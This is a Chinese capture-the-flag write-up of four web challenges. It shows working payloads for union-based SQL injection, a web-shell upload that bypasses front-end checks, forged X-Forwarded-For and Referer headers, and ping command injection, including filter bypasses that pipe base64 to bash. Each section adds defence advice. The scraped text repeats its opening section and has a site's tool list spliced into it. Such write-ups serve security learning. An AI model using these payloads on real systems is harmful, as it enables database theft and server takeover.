
一:Newscenter
打开页面如下所示。

经过尝试,得知在输入框中输入数字可得到不同内容。

输入 23 就没有新闻。

由此可知该输入框与数据库有交互,考察点可能为 SQL 注入。发现将数据库中所有的内容都查询了出来,确认考察 SQL 注入。

字段长度为 3。
23' order by 3 #

回显字段有 2, 3。
23' union select 1,2,3 #

数据库名为 news。
基于攻防世界四道 Web 题目演示常见漏洞利用方法。Newscenter 章节通过 SQL 联合查询注入获取数据库表结构与 Flag;upload1 章节演示绕过前端验证上传图片马并连接获取权限;Xff_referer 章节讲解伪造 HTTP 头(XFF 和 Referer)以突破 IP 访问限制;Command_execution 章节演示命令注入执行系统命令查找并读取 Flag。文末总结了各漏洞的考察点、解题思路及防御建议,包括使用预编译语句、限制上传类型、避免依赖客户端可控字段等安全措施。


打开页面如下所示。

经过尝试,得知在输入框中输入数字可得到不同内容。

输入 23 就没有新闻。

由此可知该输入框与数据库有交互,考察点可能为 SQL 注入。发现将数据库中所有的内容都查询了出来,确认考察 SQL 注入。

字段长度为 3。
23' order by 3 #

回显字段有 2, 3。
23' union select 1,2,3 #

数据库名为 news。

微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML 转 Markdown 互为补充。 在线工具,Markdown 转 HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML 转 Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online

表名如下。
23' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="news" #

根据表名查到列名。
23' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="secret_table" #

成功拿到 flag。
23' union select 1,fl4g,3 from secret_table #

发现有提示框提示需要上传图片,既然是提示框那就说明是前端验证。

关闭提示框。

然后我们上传一张 php 即可。

用蚁剑连接即可,成功拿到 flag。

打开提示我们 IP 必须为 123.123.123.123,那我们得知既然要 IP 来自于 123,那就需要进行伪造 IP 头也就是 X-Forwarded-For 字段。

打开 Burp Suite 进行抓包。
输入 X-Forwarded-For:123.123.123.123 进行伪造
发送后又提示我们来源为 google,来源字段是 Referer。

伪造 Referer 字段。

打开发现为 ping 功能,我们先随便 ping 一下然后再看看能否查看其他数据。

Ping 127.0.0.1 发现可以,那我们填写这样的 payload:
127.0.0.1 | ls

成功执行 ls,说明没有任何过滤。那接下来就可以查找 flag 了。

执行
127.0.0.1 |find / -name "fl*"
发现可以文件如下。

成功拿到 flag。

考察点
解题思路
',观察是否存在报错。ORDER BY 确定查询字段数(如 ' ORDER BY 3--)。' UNION SELECT 1,2,database()-- 获取数据库名。information_schema.tables)、列名,最终读取 flag 字段。关键技术
information_schema 数据库获取元数据。防御建议
考察点
解题思路
.php,并抓包修改 Content-Type 为 image/jpeg。.htaccess 文件设置解析规则(如 AddType application/x-httpd-php .jpg)。关键技术
up.php.phtml)。test.php.xxx)。防御建议
考察点
X-Forwarded-For(XFF)和 Referer 头绕过访问控制。解题思路
X-Forwarded-For: 127.0.0.1 伪装本地 IP。Referer 为题目指定域名(如 http://www.google.com)通过验证。关键技术
防御建议
考察点
解题思路
127.0.0.1; ls 尝试执行命令。${IFS} 或 %09(Tab 的 URL 编码)。ca\t 或 base64 编码命令(如 echo "Y2F0IGZsYWc=" | base64 -d | bash)。cat 或 tac 命令读取 flag 文件。关键技术
;、&、|、||。cat fla*。防御建议
subprocess 模块)替代直接执行命令。